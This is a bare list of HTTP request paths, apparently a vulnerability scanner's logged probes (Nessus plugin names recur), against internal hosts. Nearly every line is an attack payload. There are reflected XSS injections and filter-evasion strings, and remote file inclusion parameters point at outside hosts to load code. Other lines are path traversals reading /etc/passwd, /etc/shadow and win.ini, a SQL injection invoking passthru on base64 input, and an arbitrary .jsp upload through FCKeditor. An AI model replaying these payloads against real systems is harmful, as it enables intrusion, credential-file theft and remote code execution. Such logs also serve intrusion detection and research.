/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.96:8080/4dckqcc0acprbz??
/administrator/components/com_feederator/includes/tmsp/subscription.php?globalsmosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?
/i7prbs22.cgi?<script>document.cookie="testjnre=7328;"</script>
/orangehrm/lib/controllers/CentralController.php?id=USG001&editID=MOD002&uniqcode=UGR
/u95h6ymu.htm?<script>document.cookie="testkhwc=4028;"</script>
/mod_membre/inscription.php?chemin=http://192.168.202.96:8080/4dckqcc0acprbz??
/en-us/hipkz026.do?<script>document.cookie="testyrbs=2855;"</script>
/<script>cross_site_scripting.nasl</script>.x
/g8nu2yy7.nsf?<script>cross_site_scripting.nasl</script>
/6n7aacgg.exe?<script>cross_site_scripting.nasl</script>
/nuh3zirz.cfm?<script>cross_site_scripting.nasl</script>
/script>
/<script>document.cookie="testiklc=904;"</script>
/examples/jsp/jsp2/jspx/index.php?module=<script>foo</script>
/yef5f3d5.asp?<script>document.cookie="testcrcv=6167;"</script>
/en-us/<script>document.cookie="testvlau=8517;"</script>
/script>
/ybz5rz7a.php3?<script>document.cookie="testsbvw=6289;"</script>
/vac1l5vm.pl?<script>cross_site_scripting.nasl</script>
/iktok2bw.dll?<script>cross_site_scripting.nasl</script>
/qczkquis.pl?<script>document.cookie="testkwlg=5591;"</script>
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?
//</p><body><script/src="http://www.example.com/test?rnd=q71274247"></script><p>
/nmw0do67.nsf?<script>cross_site_scripting.nasl</script>
/script>"
/5qnlm5z2.fts?<script>document.cookie="testsixi=8451;"</script>
/ht8pn8uq.exe?<script>cross_site_scripting.nasl</script>
/7o5qp766.html?<script>cross_site_scripting.nasl</script>
/l752x1ry.html?<script>cross_site_scripting.nasl</script>
/scripts/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
/7dbjwpw6.idc?<script>cross_site_scripting.nasl</script>
/rpxyx07v.php?<script>document.cookie="testbnli=1975;"</script>
/index.php?news7"functions"=http://192.168.202.118:8080/tzhfyzkbomspvm?
/33y9gcqq.pl?<script>document.cookie="testnvxc=4301;"</script>
/yver8r9o.asp?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00
/odzk29aa.htm?<script>document.cookie="testtfvh=2141;"</script>
/order/login.php?svr_rootscript=http://192.168.202.96:8080/4dckqcc0acprbz?
/rbec2ohx.php3?<script>cross_site_scripting.nasl</script>
/dir_thatware/config.php?root_path=http://192.168.202.118:8080/zz5thkvtmlgl?'
/../../../../../../../../bin/id|
/n9xlumt5.fts?<script>cross_site_scripting.nasl</script>
/fnwhrxyd.php?<script>cross_site_scripting.nasl</script>
/en-us/<script>document.cookie="testfutf=1550;"</script>
/en-us/ddoworrl.php3?<script>document.cookie="testvlau=8517;"</script>
/weq93ppb.mscgi?<script>cross_site_scripting.nasl</script>
/script>
/<script>cross_site_scripting.nasl</script>.kspx
/include/footer.php?t_login=<script>alert("xsstest")</script>
/?<script>document.cookie="testxagh=6987;"</script>
/dda2qr7j.nsf?<script>cross_site_scripting.nasl</script>
/pxagj7n7.x?<script>cross_site_scripting.nasl</script>
/en-us/account/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>
/examples/jsp/colors/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1
/script>
/fa8p8lr8.mscgi?<script>cross_site_scripting.nasl</script>
/jdx255ea.do?<script>document.cookie="testziyq=5055;"</script>
/oie504mr.idc?<script>document.cookie="testtpby=7052;"</script>
/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
/o6ebbirj.cfm?<script>cross_site_scripting.nasl</script>
/j4drbkil.cgi?<script>cross_site_scripting.nasl</script>
/3j8echh0.pl?<script>document.cookie="testfuqi=4189;"</script>
/<script>document.cookie="testvowq=604;"</script>
/en-us/jnv890lt.asp?<script>cross_site_scripting.nasl</script>
/dslpwt15.jsp?<script>document.cookie="testtkio=5454;"</script>
/82q7ywa8.pl?<script>document.cookie="testpwew=1315;"</script>
/orangehrm/lib/controllers/CentralController.php?leavecode=Leave&action=Leave_Type_Summary??allCheck=on&txtLeaveTypeName%5b%5d=Medical&id%5b%5d=LTY002&btnDel.x=1&btnDel.y=1
/manager/index.php?search=<script>foo</script>
/ghswfouu.exe?<script>document.cookie="testsqmm=5713;"</script>
/8x6w469u.do?<script>document.cookie="testgfjr=1286;"</script>
/examples/jsp/jsp2/el/review.php?id=1&cat=&subcat="><script>alert('phpmydirectory_multiple_xss.nasl');</script>
/i686v90l.asp?<script>document.cookie="testfutf=1550;"</script>
/bzuf9ozq.exe?<script>cross_site_scripting.nasl</script>
/nmw0do67.jsp?<script>cross_site_scripting.nasl</script>
/o35zot2r.php3?<script>cross_site_scripting.nasl</script>
/script>
/d5a5renl.do?<script>cross_site_scripting.nasl</script>
/?<script>document.cookie="testyias=101;"</script>
/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/ghl9il?
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00
/ny1b3qq4.php3?<script>cross_site_scripting.nasl</script>
/news.php?scriptpath=http://192.168.202.118:8080/ghl9il??
/search/submit.php?config"sipssys"=http://192.168.202.118:8080/ghl9il?
/script/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?
/tuwjta1w.pl?<script>document.cookie="testpokn=7494;"</script>
/qhvu0pdg.idc?<script>document.cookie="testchuc=2100;"</script>
/main.php?frm_daynight=q51426141&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=
/examples/jsp/num/search.jsp?q=%"<script>alert(1331904373)</script>
/uc3w3bdi.nsf?<script>document.cookie="testxllt=9940;"</script>
/fpnpp5zg.fts?<script>document.cookie="testyias=101;"</script>
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/vir0v3xfc?
/examples/jsp/sessions/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00
/../../../../../../../../../../../etc/passwd
/script>
/m2fpztty.kspx?<script>cross_site_scripting.nasl</script>
/examples/jsp/num/search=<script>alert('xss')</script>
/examples/servlets/servlet/snpfiltered.pl?t=c&u=<script>foo</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=q44275597&scr_height=&scr_width=
/failure.asp?err_txt=text</b><script>alert("wvs-xss-magic-string-410166083338");</script><b>text
/tukodz3j.kspx?<script>cross_site_scripting.nasl</script>
/readmore.php?config"sipssys"=http://192.168.202.118:8080/tzhfyzkbomspvm?
/0u75ldxq.kspx?<script>cross_site_scripting.nasl</script>
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/iroy1gvqrrqu?
/<script>document.cookie="testcrcv=6167;"</script>
/scripts/index.php?module=<script>foo</script>
/en-us/esmozg5d.pl?<script>cross_site_scripting.nasl</script>
/..%uF025..%uF025..%uF025{FILE}
/m4kkjf8l.cfc?<script>document.cookie="testyglc=8988;"</script>
/0rufe52p.nsf?<script>cross_site_scripting.nasl</script>
/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/2aibfaczmac8?
/ybz5rz7a.dll?<script>document.cookie="testsbvw=6289;"</script>
/script>
/index.php?news7"functions"=http://192.168.202.118:8080/zz5thkvtmlgl?
/5o9zq43e.cfc?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00
/en-us/<script>document.cookie="testtpby=7052;"</script>
/en-us/i686v90l.cfc?<script>document.cookie="testfutf=1550;"</script>
/0u75ldxq.exe?<script>cross_site_scripting.nasl</script>
/script>
/9kr0ih0v.php3?<script>document.cookie="testzgnm=1183;"</script>
/search/submit.php?config"sipssys"=http://192.168.202.118:8080/tzhfyzkbomspvm?
/b4vng02k.do?<script>document.cookie="testtrlh=3672;"</script>
/eei78ore.exe?<script>cross_site_scripting.nasl</script>
/m5103snj.jsp?<script>cross_site_scripting.nasl</script>
/l752x1ry.dll?<script>cross_site_scripting.nasl</script>
/scripts/tombstone.cfm?profileid=<script>foo</script>
/<script>document.cookie="testftxz=5980;"</script>
/8x6w469u.cfc?<script>document.cookie="testgfjr=1286;"</script>
/3j8echh0.dll?<script>document.cookie="testfuqi=4189;"</script>
/manager/viewcvs.cgi/?cvsroot=<script>foo</script>
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/phpmyadmin/index.php?mod_id=2&kb_ask=</textarea><script>alert("cerberus_support_center_mult_flaws.nasl")</script>
//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
/cacti/nessus"><script>alert('mod_perl_status_uri_xss.nasl')</script>
/en-us/jnv890lt.html?<script>cross_site_scripting.nasl</script>
/en-us/jnv890lt.aspx?<script>cross_site_scripting.nasl</script>
/cgi-bin/review.php?id=1&cat=&subcat="><script>alert('phpmydirectory_multiple_xss.nasl');</script>
/iktok2bw.jspa?<script>cross_site_scripting.nasl</script>
/p043snfr.cgi?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00
/l752x1ry.php?<script>cross_site_scripting.nasl</script>
/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
/'(^'%2b)/)1)</script>
/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/zz5thkvtmlgl?
/u8yiqilu.mscgi?<script>document.cookie="testswjp=6010;"</script>
/script>
/jnv890lt.cfc?<script>cross_site_scripting.nasl</script>
/index.php?c=access&a=login&ref_c=nessus"><script>alert(608742635)</script>&ref_a=projectpier_login_page_xss.nasl"><script>alert(1145091042)</script>
/t578vqea.kspx?<script>document.cookie="testsory=7676;"</script>
/8t9v8k7x.idc?<script>document.cookie="testhvje=9403;"</script>
/b1q8bywu.exe?<script>cross_site_scripting.nasl</script>
/v3axg1p8.jspa?<script>document.cookie="testxagh=6987;"</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=&scr_height=&scr_width=q81848235
/l13b77e5.idc?<script>document.cookie="testjvvf=7721;"</script>
/en-us/<script>document.cookie="testyrbs=2855;"</script>
/../../../../../../../../%2A
/vwmg565s.dll?<script>cross_site_scripting.nasl</script>
/169okeyj.cfc?<script>document.cookie="testxeoi=3573;"</script>
/script>
/en-us/hipkz026.cfc?<script>document.cookie="testyrbs=2855;"</script>
/en-us/account/forumdisplay.php?fid=21"><script>x</script>
/o6ebbirj.idc?<script>cross_site_scripting.nasl</script>
/j4rdyhw8.idc?<script>document.cookie="testrluj=1420;"</script>
/1qwv2p5p.cfc?<script>document.cookie="testvqcy=252;"</script>
/script>"/>
/examples/servlets/servlet/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
/script>
/jnt3f86c.kspx?<script>document.cookie="testcmax=9270;"</script>
/addressbook.php?\"><script>alert(vulnerable)</script><!--
/x7pclv4s.jsp?<script>document.cookie="testiulz=3709;"</script>
/dda2qr7j.pl?<script>cross_site_scripting.nasl</script>
/ydexw8by.fts?<script>document.cookie="testulex=4996;"</script>
/examples/jsp/jsp2/el/search=<script>alert('xss')</script>
/0rufe52p.jsp?<script>cross_site_scripting.nasl</script>
/7uz3ok60.php?<script>cross_site_scripting.nasl</script>
/nuh3zirz.htm?<script>cross_site_scripting.nasl</script>
/index.php/content/search/?sectionid=3&searchtext=<script>alert(document.cookie)</script>
/readmore.php?config"sipssys"=http://192.168.202.118:8080/zz5thkvtmlgl?
/bxnyrhmh.pl?<script>document.cookie="testmjct=1867;"</script>
/examples/jsp/checkbox/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/templates/text-only/template.tpl.php?renderer=XXpathXX
/iktok2bw.exe?<script>cross_site_scripting.nasl</script>
/vjbrrppi.do?<script>cross_site_scripting.nasl</script>
/ewc3rz1l.dll?<script>document.cookie="testkgqo=204;"</script>
/<script>document.cookie="testtbbe=856;"</script>
/9ko6m4c8.exe?<script>document.cookie="testylik=3403;"</script>
/en-us/ddoworrl.dll?<script>document.cookie="testvlau=8517;"</script>
/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_serverhttp_nessus_ag5vvnfs));die;/*
/y8pmygrp.htm?<script>cross_site_scripting.nasl</script>
/script/ident/identification.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00
/scripts/polls.scr.php?globalspthclasses=http://192.168.202.118:8080/zz5thkvtmlgl??
/eei78ore.x?<script>cross_site_scripting.nasl</script>
/zmvq66jy.pl?<script>cross_site_scripting.nasl</script>
/gvx7m5ti.php?<script>document.cookie="testwldz=3506;"</script>
/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
/script>
/psynch/nph-psa.exe?css=http://192.168.202.118:8080/zz5thkvtmlgl?
/examples/jsp/checkbox/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
/bxnyrhmh.jsp?<script>document.cookie="testmjct=1867;"</script>
/169okeyj.dll?<script>document.cookie="testxeoi=3573;"</script>
/zoomstats/libs/dbmax/mysql.php?globals'lib''db''path'=http://192.168.202.118:8080/tzhfyzkbomspvm??
/script>
/j4drbkil.dll?<script>cross_site_scripting.nasl</script>
/en-us/<script>document.cookie="testzgnm=1183;"</script>
/script>
/<script>document.cookie="testpokn=7494;"</script>
/h5sc3gxy.htm?<script>cross_site_scripting.nasl</script>
/script>
/l752x1ry.htm?<script>cross_site_scripting.nasl</script>
/script>
/recordings/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
/yver8r9o.jspa?<script>cross_site_scripting.nasl</script>
/lsoix5h3.do?<script>cross_site_scripting.nasl</script>
/y8pmygrp.aspx?<script>cross_site_scripting.nasl</script>
/yacs/scripts/update_trailer.php?contextpath_to_root=http://192.168.202.96:8080/4dckqcc0acprbz??
//../../../../../../../../../winnt/win.ini
/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28^%27%2b%29/%291%29}};xhr.send%28%29;%3C/script%3E
/iv5vkgam.dll?<script>document.cookie="testfosd=94;"</script>
/3hlysl2x.htm?<script>document.cookie="testgjbe=8505;"</script>
//CTGKDZ
/scriptextensions/
/odzk29aa.cfm?<script>document.cookie="testtfvh=2141;"</script>
/phpmyadmin/index.php?module=<script>foo</script>
/hjdzm96v.cgi?<script>document.cookie="testbyqe=7474;"</script>
/0w155a7c.html?<script>cross_site_scripting.nasl</script>
/scriptpath/index.php?page=http://192.168.202.96:8080/txenjrxf3?
/examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
/examples/jsp/error/index.php?mod_id=2&kb_ask=</textarea><script>alert("cerberus_support_center_mult_flaws.nasl")</script>
/examples/jsp/cal/viewcvs.cgi/?cvsroot=<script>foo</script>
/SCRIPT>
/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/ghl9il?
/bzuf9ozq.php?<script>cross_site_scripting.nasl</script>
/script_path/config.inc.php?_path=http://192.168.202.118:8080/ghl9il??
/6wb70v0b.x?<script>cross_site_scripting.nasl</script>
/apavxugx.cfm?<script>document.cookie="testdnbh=5237;"</script>
/en-us/oie504mr.html?<script>document.cookie="testtpby=7052;"</script>
/j4rdyhw8.php?<script>document.cookie="testrluj=1420;"</script>
/i2n4v4rl.idc?<script>cross_site_scripting.nasl</script>
/script>
/ygkjkngd.cfc?<script>document.cookie="testnago=4518;"</script>
/0w155a7c.asp?<script>cross_site_scripting.nasl</script>
/en-us/s7qus4g3.idc?<script>cross_site_scripting.nasl</script>
/m2fpztty.do?<script>cross_site_scripting.nasl</script>
/scripts/search.scr.php?globalspthclasses=http://192.168.202.118:8080/ghl9il??
/login.php?error=>"><script>alert('daloradius_error_xss.nasl')</script>
/script>
/search.jsp?q=%"<script>alert(1331922091)</script>
/apavxugx.php?<script>document.cookie="testdnbh=5237;"</script>
/9ko6m4c8.fts?<script>document.cookie="testylik=3403;"</script>
/v3axg1p8.pl?<script>document.cookie="testxagh=6987;"</script>
/vmi8bb12.fts?<script>document.cookie="testlerc=2575;"</script>
/wps/wcm/webinterface/login/login.jsp?"><script>alert("ibm_login_qs_xss.nasl-1331908876")</script>
/i686v90l.aspx?<script>document.cookie="testfutf=1550;"</script>
/ap58k3ci.jsp?<script>cross_site_scripting.nasl</script>
/examples/servlets/servlet/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/XSS/alert(a.source)</SCRIPT>
/script>
//<body><script/src="http://www.example.com/test?rnd=q26857453"></script>
/cacti/index.php?search=<script>foo</script>
/examples/jsp/jsp2/el/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
/script>
/u8yiqilu.jsp?<script>document.cookie="testswjp=6010;"</script>
/vwmg565s.php?<script>cross_site_scripting.nasl</script>
/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
/j4rdyhw8.htm?<script>document.cookie="testrluj=1420;"</script>
/kb.php?category_id=xxl><script>alert(412556083479)</script>
/gvx7m5ti.nsf?<script>document.cookie="testwldz=3506;"</script>
/en-us/odzk29aa.dll?<script>document.cookie="testtfvh=2141;"</script>
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/jzk.jsp\x00
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/4dckqcc0acprbz?'
/issue/createissue.aspx?rtcdescription$radeditor1=1><script>alert(414175590323);</script>
/d7ktpmcq.cfc?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/script>
/606wkcop.jspa?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testbyqe=7474;"</script>
/um7xpn15.jsp?<script>document.cookie="testotoy=6142;"</script>
/ldap/cgi-bin/ldacgi.exe?action=<script>alert(\"vulnerable\")</script>
/tuwjta1w.cfc?<script>document.cookie="testpokn=7494;"</script>
/edzaia0i.exe?<script>cross_site_scripting.nasl</script>
/esmozg5d.asp?<script>cross_site_scripting.nasl</script>
/1qwv2p5p.cfm?<script>document.cookie="testvqcy=252;"</script>
/confirmunsubscription.php?output=http://192.168.202.96:8080/txenjrxf3?
/i2n4v4rl.cgi?<script>cross_site_scripting.nasl</script>
/fa8p8lr8.cfm?<script>cross_site_scripting.nasl</script>
/1qwv2p5p.idc?<script>document.cookie="testvqcy=252;"</script>
/script>alert('vulnerable')</script>.cfm
/wps/wcm/webinterface/login/login.jsp?"><script>alert("ibm_login_qs_xss.nasl-1331904238")</script>
/5o9zq43e.jsp?<script>cross_site_scripting.nasl</script>
/n1afe1y6.aspx?<script>cross_site_scripting.nasl</script>
/n1afe1y6.exe?<script>cross_site_scripting.nasl</script>
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/frznctvhi0i5?
/6dlc2zm9.dll?<script>document.cookie="testqpux=4016;"</script>
/kb.php?category_id=xxl><script>alert(412625577808)</script>
/ygkjkngd.fts?<script>document.cookie="testnago=4518;"</script>
/script//ident/index.php?path_inc=http://192.168.202.118:8080/ghl9il?
/en-us/<script>cross_site_scripting.nasl</script>.aspx
/script>
//
/hipkz026.pl?<script>document.cookie="testyrbs=2855;"</script>
/yef5f3d5.do?<script>document.cookie="testcrcv=6167;"</script>
/7o5qp766.fts?<script>cross_site_scripting.nasl</script>
/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('vulnerable')</script>&lt;/script&gt;
/g3w7y7u5.jsp?<script>document.cookie="testbfpq=3326;"</script>
/scripts/includes/hnmain.inc.php3?configincdir=http://xxxxxxxxxx/
/en-us/account/wiki.php/<script>foo</script>
/g8nu2yy7.aspx?<script>cross_site_scripting.nasl</script>
/7dbjwpw6.dll?<script>cross_site_scripting.nasl</script>
/oie504mr.nsf?<script>document.cookie="testtpby=7052;"</script>
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/moclyxlwqyfjnp?'
/script>
/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/2aibfaczmac8?
/odzk29aa.asp?<script>document.cookie="testtfvh=2141;"</script>
/phpmyadmin/search.jsp?q=%"<script>alert(1331904224)</script>
/b4vng02k.htm?<script>document.cookie="testtrlh=3672;"</script>
/i7prbs22.htm?<script>document.cookie="testjnre=7328;"</script>
/weq93ppb.idc?<script>cross_site_scripting.nasl</script>
/ybz5rz7a.exe?<script>document.cookie="testsbvw=6289;"</script>
/d7ktpmcq.htm?<script>cross_site_scripting.nasl</script>
/script>
/3j8echh0.jsp?<script>document.cookie="testfuqi=4189;"</script>
/administrator/components/com_feederator/includes/tmsp/subscription.php?globalsmosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl?
/en-us/s7qus4g3.pl?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00
/3hlysl2x.asp?<script>document.cookie="testgjbe=8505;"</script>
/nyvbv05h.fts?<script>document.cookie="testftxz=5980;"</script>
/3hlysl2x.jspa?<script>document.cookie="testgjbe=8505;"</script>
/en-us/ddoworrl.exe?<script>document.cookie="testvlau=8517;"</script>
/en-us/33y9gcqq.exe?<script>document.cookie="testnvxc=4301;"</script>
/script>
/examples/jsp/colors/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
/7uz3ok60.x?<script>cross_site_scripting.nasl</script>
/snippetmaster/includes/vars.inc.php?_sessionscript_path=http://192.168.202.118:8080/tzhfyzkbomspvm??
/b4vng02k.idc?<script>document.cookie="testtrlh=3672;"</script>
/hipkz026.asp?<script>document.cookie="testyrbs=2855;"</script>
/<script>document.cookie="testxllt=9940;"</script>
/index.php?show='"><script>alert(413756083531)</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=q39895688&scr_width=
/en-us/n9xlumt5.kspx?<script>cross_site_scripting.nasl</script>
/examples/servlets/servlet/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f
/script>
/yacs/scripts/update_trailer.php?contextpath_to_root=XXpathXX?
/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/moclyxlwqyfjnp??
/3m5knyc4.fts?<script>document.cookie="testbgqj=6434;"</script>
/3m5knyc4.do?<script>document.cookie="testbgqj=6434;"</script>
/scripts/polls.scr.php?globalspthclasses=http://192.168.202.118:8080/tzhfyzkbomspvm??
/module/forum/forum.php?fd=http://192.168.202.118:8080/2aibfaczmac8?=';
/q703m78q.htm?<script>document.cookie="testvowq=604;"</script>
/gvx7m5ti.cfm?<script>document.cookie="testwldz=3506;"</script>
/script_path/config.inc.php?_path=http://192.168.202.96:8080/4dckqcc0acprbz??
/scriptpath/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv?
/bl8sefdm.cfc?<script>cross_site_scripting.nasl</script>
/scripts/search.jsp?q=%"<script>alert(1331918979)</script>
/phpmyadmin/search.jsp?q=%"<script>alert(1331904374)</script>
/apavxugx.mscgi?<script>document.cookie="testdnbh=5237;"</script>
/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008637')</script>
/script//ident/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/ju0u7kfo.jsp?<script>cross_site_scripting.nasl</script>
/b1q8bywu.jsp?<script>cross_site_scripting.nasl</script>
/examples/jsp/jsp2/jspx/forumdisplay.php?fid=21"><script>x</script>
/cgi-bin/login.php?course="><script>alert(atutor_xss.nasl)</script>
/nyvbv05h.pl?<script>document.cookie="testftxz=5980;"</script>
/j4drbkil.exe?<script>cross_site_scripting.nasl</script>
/yef5f3d5.cgi?<script>document.cookie="testcrcv=6167;"</script>
/3j8echh0.kspx?<script>document.cookie="testfuqi=4189;"</script>
/7u1pb2xi.dll?<script>document.cookie="testlwwz=718;"</script>
/scripts/xtextarea.scr.php?GLOBALSPTHspaw=XXpathXX?
/psynch/nph-psa.exe?css=http://192.168.202.96:8080/4dckqcc0acprbz?
/iktok2bw.do?<script>cross_site_scripting.nasl</script>
/en-us/i686v90l.x?<script>document.cookie="testfutf=1550;"</script>
/fo564rei.exe?<script>cross_site_scripting.nasl</script>
/dir_thatware/config.php?root_path=http://192.168.202.96:8080/llumt7msyau5y?'
/vwmg565s.x?<script>cross_site_scripting.nasl</script>
/b5xdqgz2.php?<script>cross_site_scripting.nasl</script>
/examples/jsp/checkbox/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search
/../../../../../../../../../../etc/shadow^^
/uvazfs7p.kspx?<script>document.cookie="testwtbo=4831;"</script>
/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
/jw64yq8u.do?<script>document.cookie="testylfu=1313;"</script>
/o35zot2r.do?<script>cross_site_scripting.nasl</script>
/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/2aibfaczmac8?
/script>
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/2aibfaczmac8?'
/x7pclv4s.pl?<script>document.cookie="testiulz=3709;"</script>
/s7qus4g3.dll?<script>cross_site_scripting.nasl</script>
/b1q8bywu.cfc?<script>cross_site_scripting.nasl</script>
/lsoix5h3.jsp?<script>cross_site_scripting.nasl</script>
/dir_thatware/config.php?root_path=http://192.168.202.118:8080/moclyxlwqyfjnp?'
/ewc3rz1l.asp?<script>document.cookie="testkgqo=204;"</script>
/en-us/dda2qr7j.pl?<script>cross_site_scripting.nasl</script>
/i686v90l.nsf?<script>document.cookie="testfutf=1550;"</script>
/jujgxwav.idc?<script>document.cookie="testknim=9383;"</script>
/altercast/altercast?op=<script>alert("adobe_document_server_61.nasl")</script>
/u95h6ymu.jsp?<script>document.cookie="testkhwc=4028;"</script>
/oie504mr.dll?<script>document.cookie="testtpby=7052;"</script>
/en-us/9kr0ih0v.nsf?<script>document.cookie="testzgnm=1183;"</script>
/usrdetails.php?sgnuptype=csaleid<script>nessus</script>
/en-us/account/tombstone.cfm?profileid=<script>foo</script>
/5qnlm5z2.aspx?<script>document.cookie="testsixi=8451;"</script>
/../../../../../../../../../../../etc/shadow%00
/uc3w3bdi.idc?<script>document.cookie="testxllt=9940;"</script>
/script>
/1qwv2p5p.aspx?<script>document.cookie="testvqcy=252;"</script>
/606wkcop.kspx?<script>cross_site_scripting.nasl</script>
/x2gyorli.dll?<script>document.cookie="testwhac=3130;"</script>
/hrttz9fj.asp?<script>document.cookie="testtbjy=7334;"</script>
/qczkquis.exe?<script>document.cookie="testkwlg=5591;"</script>
/*
/scripts/shop.plx/page=nessus1587302768
/script>
//192.168.28.202/*<apache_mod_proxy_ftp_glob_xss.nasl>
/report.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/ipb5ri?\x00
/dda2qr7j.mscgi?<script>cross_site_scripting.nasl</script>
/script>
/t3af3tdz.asp?<script>cross_site_scripting.nasl</script>
/firewall/policy/dlg?q=-1&fzone=t<script>alert('vulnerable')</script>>&tzone=dmz
/bxnyrhmh.kspx?<script>document.cookie="testmjct=1867;"</script>
/0z575z74.htm?<script>document.cookie="testuhsv=9753;"</script>
/<script>cross_site_scripting.nasl</script>.pl
/vwmg565s.do?<script>cross_site_scripting.nasl</script>
/examples/jsp/error/login.php?course="><script>alert(atutor_xss.nasl)</script>
/5qnlm5z2.php3?<script>document.cookie="testsixi=8451;"</script>
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv?
/templates/admin/login_form.php?msg_login=<script>alert("force_xss")</script>
/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/fo564rei.jsp?<script>cross_site_scripting.nasl</script>
/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
/scs86g1p.aspx?<script>document.cookie="testquyx=2820;"</script>
/?<script>document.cookie="testvlau=8517;"</script>
/dda2qr7j.x?<script>cross_site_scripting.nasl</script>
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/p043snfr.dll?<script>cross_site_scripting.nasl</script>
/zmvq66jy.aspx?<script>cross_site_scripting.nasl</script>
/33y9gcqq.cgi?<script>document.cookie="testnvxc=4301;"</script>
/ddoworrl.cfm?<script>document.cookie="testvlau=8517;"</script>
/169okeyj.idc?<script>document.cookie="testxeoi=3573;"</script>
/zv8tv7h8.jsp?<script>document.cookie="testcqwz=9752;"</script>
/7o5qp766.do?<script>cross_site_scripting.nasl</script>
/8t9v8k7x.x?<script>document.cookie="testhvje=9403;"</script>
/sdk/../../../../../..//etc/vmware/hostd/vminventory.xml
/bxnyrhmh.nsf?<script>document.cookie="testmjct=1867;"</script>
/bn857frh.idc?<script>cross_site_scripting.nasl</script>
